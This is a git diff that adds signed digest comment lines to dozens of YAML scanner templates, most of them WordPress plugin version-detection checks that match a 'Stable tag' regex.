+ .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/cnvd/2023/CNVD-2023-72138.yaml b/http/cnvd/2023/CNVD-2023-72138.yaml index 4aa4a900ec..7c8de047a7 100644 --- a/http/cnvd/2023/CNVD-2023-72138.yaml +++ b/http/cnvd/2023/CNVD-2023-72138.yaml @@ -39,3 +39,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100f54fbffac4c2fc064563888b0cd49604f8bb1fd0ff12f0f6ae5d8baf7a0b199c0220795a81839eadcd9437d798c1e174e8f12c9f15b67ed5c585fbfa61759d3000c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..4e32af0cf3 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008606283c5f4a6a516f250c1a61cca67b27c0a150f9c93abd2dbfa6cd71b20d8602210096d90a5e7ea0e7b14774a849c913b61c1740e4644406be6d5fc04570add9aa7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..ff5520e823 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b70d45ef7750cb45fea18163cc1762389c9968ede88c9607ea4c9ceae055824b02207ddd7f17f05cdb987ceb27d683eb5a25796c2101fcb3cbec34d8a64a06bb8e3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..7be43793ed 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203ab8f402c33b2d7c091e9eeef66c27999f5f1a2b94c17ba588024548db0e98e50220543c0c146d6c55ebad32574c624836a3afc38a071d060f69078cbb0dac2d7526:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..f6197f892f 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cc58d801da4a9f6eb4cbad4b8c9b0f7078d185481875d85490584607ee07fb00022100aeb29ed7f7dc5bc494d5ba2534227c404e9d1a25db72c7dc598a61e013aef8c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..b1e6d334e6 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bd442079ef861f3f4c91123421c04aa87a7d755cc47141b08cca480ac1a6f6e402200fe945b7690a8d1740ab458548f5cf0267ebb6ba754a7cd975506fa226c3d53b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..dff4f5eb66 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044021f54a87cfb991d98d81399bf4f71d320afcdc302623c2515c1c45da7d3763221022100f58f38f7a8c677affd86faea6b690793a605e5691b6843521372adf76be7d25d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..4046901ab4 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b96738cd20f4b7088dc0ab103579c3cce2e5a211119b3b33b04a52c519cb884d022100e44ee19a0ce9b6c636dac04095638f04ddc3183a8e8d4b91075cfb6ce54aeb10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..1dbebb23e5 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200216c471146a77f5febedcca2fc3f465935d50961a9b1e62124c94c910cef4ed022100b9680630abb6808f23d93ec3edc2d7db8636da01b4395d8d5248e255bb97e2f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..cce37b7ec7 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200347c2cdd7c0dadb78c272b3f59b343acf1d5a6e0a72f20f45a466bb0235071e022100c97e17134d88deeb06bd9de9a447527b0748c559c3534096a7f9de62060eaedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..76d8970fff 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204a141a07fb073cd4487a6b00cb261479ed3931c8c59f3a8c701798bf139dc874022045db14acc8f06b43d3a303a1f1eed7f8242264af5c7b2b70ba7e54b0bb74cd5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..d52fe11454 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022012310e512e732d10b292d5448db774eafac3d87ce696e806c185a5cd48bf9369022100d30c97ddf7f3bc075ee129bb550f56c6ada5815e8a9c94172900d3c9a0fb8ad4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..edb037e82f 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022054c629ea0edfb1229e6128f05da666ae5c60032d4e9a4f71ca318a43b085218102207b2b06aa8831fbef6b5714c3b2d4cca7f0635a1c3524949b7cf9b015a36837fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..cdcd58bb0e 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202fbbb1a9213452347221fad3e6008d6163cdaed561b386c819780a9fbcc70c5b022004185a108b729b30fe36f1d25c9673c8f36aaa48f1ffe29e9e6c4fe232b22228:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..db570da002 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022048b00dc246813f394a6f321632684f6edc6d080515f73997a21929508359355302210090fc9cfefef99cd999c8e62a94eca764ad1f1541c6b6b0295dd0d40ceaa4a3ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..ae1ec92c8a 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206add12076614140aed213348cf683a0ca50f35dcbed8779f687df5b1660be99c022100da93b0cec1bdc0c6a3dd2718b583bdae63272067561d7000be0575c943639169:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..a502140ad2 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022045b0bbf52fcbf6440a7a24723839d22a03c2a3dc2975ba54b4553e6bcd2618d4022100ce5faeb99e9ba95be05210924fa5e49a59ffc45c1e317ec80f26a1c487bf0da6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..d8966ab440 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aed0c40414fe4699ef6a24e17e5e889a8f3e54ed56620019d59f9c4a8bd3cc89022100f681e41dbdbe8019cb787d1f56eb2569a67615bf4ee3c91b1604f0e1507f7070:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..b134623dd0 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f9b3ae536a37f03ff1186803666ed712fe91aea77b8392069b613eab7bf55c38022100bb1c3c9f33528a4e40fa9df55df5edcec7b07b5504e1c76e7ef9d9ab9286e698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..8f03a14ee4 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220416470f600da627b74f5280c73fdfa1fd71bb3da4b3cb265727c8ef106332c94022100f91459462ac2e998028bd01150b28f243d004f61fb6414c9706be17b890f3d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..c39853553f 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200bed268f7863e4912cbaadc18491f0ee1e51d76ac4d9ff6306c880423ba20209022030a7529b7020096f5d373352276fa3998c3a3daa76a29c81184aae1c1cbdba92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..9a6978d99c 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ce18af55204065ec4faed8b3fefa3802dabb24ad8c115ffa8dca73c29a1bd20002200d1dfafa1652c95f0937feaa02c510b4deb60add21ae997d4e454f087bfc362b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..190d89e567 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100970d51cb2bdf89bebcf79d5ae373ddd6ad838d4088c8af4229379b255e25ff8d022100c646d678badbc4e23f7e6143e6e93ec027077b15f6b0a86377746f5595ab4882:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..8dbfbd5ef3 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202a011febc79211ded5df5f7d17128585c5933cd53cdfc46aa5a682529110961f02200f7eba965ef016f05e7fca945ba4372ef175e80790f924486b7f7ddeeb2c8c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..07b080e914 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022065cb67c24e3d3004c537a174f64c6e1f8fc79b10db2999b1d9eeac3176986bf7022070f9e29239455ed9c6ec47dcd3ab6eb2b83ed14b3a94508aa26abe10c0d88633:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..28da0adbb5 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220396f2ac16a43a45262ed1e31f1aa775a43a07847fb2ff4f4f6bb6cb4d01e48980220591d710bc13d48591d038b20b85686a5a88592bd1448c8be8900ef64a4b4981a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..19765d635c 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b4cafd184e4f3dd96fa8665e3c32de16c57030c658156f85eb4f4bc1e884942f022003abc34f00c5e5aef17591b586a4ecd9b72d209b532c93372672d7f5833b6616:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..6cd26100cd 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200bc5f9deeac0e2569855f9ece30a2297ecf531f9ad867dc19ceedff4c34de13f022100a4cad2197e2cfb96f54d1a4a9191a76033a1ce2418d6e006ff38d6ded59df5d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..77e9a88025 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f74870afb8e0bbb441d3507211e4c86ecd17708b45882e8292f46a8c1493d0b202200ba098e676e579e507c054dc0094c7f57a82074dcec4bc8244552adc9701db07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..8e7c22a953 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b38af88ad08fa7e1f93d757cbb8b5aeeb5177e4c640706846414f1c0d5a1113102206d3595fbb49d4eba94164c6407a0dfd7701c44dc7d774a823447b32676cfd627:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..b2db47c6ee 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100826f619fa41c157bb7de2bbd2d62dfae7c026e9456829ce0c38b8c8a8062884702204f3f2400d5ca43db24355a70e58479725265a02df288a6e38187694e5cf1b135:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..d2f60d3deb 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e2b61c2c0ffb01fa594a846bdb0aea6cc1a0d59a9581466c60346a5d224bc87f022100d3d2ef6c5b03a29b257f1d97a6d35d4b35fa62bfae9972b16e908e2abcfd9af4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..5a84317c4b 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022021aa3833cf2697be230162a46e111f2c015c5a73d6c1cf800e80c03c69c7b2040220301fccd0f1efd9a9a8d7f9939ccb329b0e69ef4a1770a0f03fd8f4950e42c956:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..748be121ae 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220728f156460ff8b41a210da0df6c440f099c75614bffa71c872f476337fd9c71a0221008ece0b5d384f43444992891830824dcd4579889ffc08ade8d43f5d70f0c79e07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..2ce42fb603 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022075eb723016c39818c3bd0f6b265561256f5ea9d44d95246192694ffcebcbe71b022100c2084d3171a6696201802ee1c7a9542e72a987e1ae11dd2d62682dd0485ff711:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..96aa3150d8 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022057fdefbe002ab884f26afb049e03e0773e7542e62085efd8cdf8a4dd70f46e26022100e0ed482faa6957bf31663bf2cb3e9baa2438cccc8e22c73c3f3728971bdae5ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..a69679fef1 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022032c227f6255411e84dfd6ab9f362ef347b30df601ba52694cc26f6655a8118c9022100dc515e290a94e30451a144f753a1f59ecd28b9dd81f64c9543651a04ec5dff5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..1916916600 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008a4fef103f7dd1ac08a6ad69aa66ea5697d7557bd9e9772be206c4e52a7a35b7022036b6a05c355237392782fdc08cfe2c7486ab3e845eaf4357c658b35bb34af4e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..58f8b6e4e8 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f74a0f6447631353736230c5ddb0a71fa51e8bba63d1598a8182f255d4f6f84b02205d2610507616991551e90c8eaf7e25cb226c91bccb323f5d086fc42787e0b91e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..b229f7e12e 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205665aa5f9a3ccbd1826b9fe0bc75a601219bcf51e5f57873f7f9cc86b8bf12470220731a267253824897ce254fe59faf4baeba2bf93101720fda434ef74d06c1add7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..62dbdbecdb 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d85248215a53996e263c7278a45508637ead7f2ecd1611dadf41f6a49f513b48022100fa566ebddd0d62bf5fa17a7a3b543bcb56ac60bfa64acc7f20aa77abf14d1243:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..d5480908ee 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022017bed65938d42d7399af9de90c71947c8d950ff4d7b7c51a714406c2beadd47d022006b984d8be22c2cfb4774588ed476ef401b579c3d0051a4bd269b6cf1f4d2c03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..6f52ffd7de 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b2e090305e3fa421de85a036c651c8f9d59ae3978dd4d4710aa1a66afc08685c022015e18e8e493332e04e66d43a0a0e2d85ef0355432d8ddf98d9621e63b37b8425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..12c75543ae 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ff8b3fa119ca5abb54bec147986b6069612e15ad34245990b9c4b23ddd5b58f40220249686bd20f914827b2faf7b16a1fe954e2b3fafe8e87993886b23868aec488a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..251f10829d 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b795879f0bc00304e0fa78b2b4ea4b719159d06a15cfe703ee2b383834139986022100bd1f05f3ab41310aacd268b065d32311d06f5bda0e867610d9f904f4d268a18b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..774a08f974 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210093632ab38b7ad5353d32e9967173b8f39081dbb1f3f75484c84bd0e47e02343c02204a01744e29c44573922c98c72cb180fd83d23d8afb0fe9bfcdbe3f72ef62bbd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..bb3073fce1 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022065cfd41e36bbba83160f5ccab1b05b02bf806c48bbd4440948604dcc5339513c0220793692d071822772e93d311908b3d9a6e61513ba23c2c6ff5661e34af5edd1b7:922c64590222798bb761d5b6d8e72950 